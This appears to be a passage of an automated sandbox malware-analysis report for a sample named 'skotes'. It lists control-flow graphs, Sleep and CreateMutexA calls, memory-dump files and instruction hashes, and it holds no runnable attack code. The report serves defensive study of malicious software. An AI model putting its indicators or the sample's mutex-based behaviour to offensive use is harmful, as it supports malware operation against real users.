                                                                                                                                                                                                                                          control_flow_graph 238 699adc-699ae8 239 699aea-699af8 238->239 240 699afe-699d91 call 6ad663 call 6a7a00 call 695c10 call 698b30 call 6a8220 call 6a7a00 call 695c10 call 698b30 call 6a8220 238->240 239->240 241 69a917 239->241 243 69a953-69a994 Sleep CreateMutexA 241->243 244 69a917 call 6c6c6a 241->244 249 69a9a7-69a9a8 243->249 250 69a996-69a998 243->250 244->243 250->249 252 69a99a-69a9a5 250->252 252->249
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310597404.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310616397.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310632940.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 1464230837-2760472518
                                                                                                                                                                                                                                          • Opcode ID: 852a736faf2fddcc6e60ff563bf6e6ac5d125fca9e6870d6283ae30699675600
                                                                                                                                                                                                                                          • Instruction ID: 0ca6a817d83a9c01cf3a58298fec4f697ad5f191aa44f21b9471249d533932e5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 852a736faf2fddcc6e60ff563bf6e6ac5d125fca9e6870d6283ae30699675600
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F82148317042449BFF18ABACDC89B6DB7ABEBC1310F20421CE5048BBD5DB755A418A52
                                                                                                                                                                                                                                          Function 0069A856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 306 69a856-69a86e 307 69a89c-69a89e 306->307 308 69a870-69a87c 306->308 309 69a8a9-69a8b1 call 697d30 307->309 310 69a8a0-69a8a7 307->310 311 69a87e-69a88c 308->311 312 69a892-69a899 call 6ad663 308->312 323 69a8b3-69a8bb call 697d30 309->323 324 69a8e4-69a8e6 309->324 314 69a8eb-69a916 call 6a80c0 310->314 311->312 316 69a94e 311->316 312->307 319 69a953-69a987 Sleep CreateMutexA 316->319 320 69a94e call 6c6c6a 316->320 325 69a98e-69a994 319->325 320->319 323->324 331 69a8bd-69a8c5 call 697d30 323->331 324->314 327 69a9a7-69a9a8 325->327 328 69a996-69a998 325->328 328->327 330 69a99a-69a9a5 328->330 330->327 331->324 335 69a8c7-69a8cf call 697d30 331->335 335->324 338 69a8d1-69a8d9 call 697d30 335->338 338->324 341 69a8db-69a8e2 338->341 341->314
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310597404.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310616397.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310632940.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 1464230837-2760472518
                                                                                                                                                                                                                                          • Opcode ID: 29d242fa86fdce71a2b8edc6cf87c53de16c7a5949cb08c6f2464c8fc8ab2849
                                                                                                                                                                                                                                          • Instruction ID: 3c083801331175e452012d85a3425bb6c238d2417b920f44e3291ecf5ea70b87
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29d242fa86fdce71a2b8edc6cf87c53de16c7a5949cb08c6f2464c8fc8ab2849
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 122128317552019AFF2877E88D8AB7DB69B9FC1304F24081AE50897BD1CE76598182D7
                                                                                                                                                                                                                                          Function 0069A34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 283 69a34f-69a35b 284 69a35d-69a36b 283->284 285 69a371-69a39a call 6ad663 283->285 284->285 286 69a93a 284->286 291 69a3c8-69a916 call 6a80c0 285->291 292 69a39c-69a3a8 285->292 288 69a953-69a994 Sleep CreateMutexA 286->288 289 69a93a call 6c6c6a 286->289 298 69a9a7-69a9a8 288->298 299 69a996-69a998 288->299 289->288 295 69a3aa-69a3b8 292->295 296 69a3be-69a3c5 call 6ad663 292->296 295->286 295->296 296->291 299->298 301 69a99a-69a9a5 299->301 301->298
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310597404.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310616397.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310632940.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 1464230837-2760472518
                                                                                                                                                                                                                                          • Opcode ID: 9cc66ccd38bfddd8491bf3bd3841c487a8d7c62ffca68ec2822e426ee4704c77
                                                                                                                                                                                                                                          • Instruction ID: 7670eb7ba58a6f6923fdd1a0acbfcf8028c032cf2c56ed6cc80666d2b451f8d9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cc66ccd38bfddd8491bf3bd3841c487a8d7c62ffca68ec2822e426ee4704c77
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F2148317002449BFF089BACDC8576CBBABEBC1314F244219E508DBBD4CB765A808692

                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                          Function 006CCBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310597404.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310616397.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310632940.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
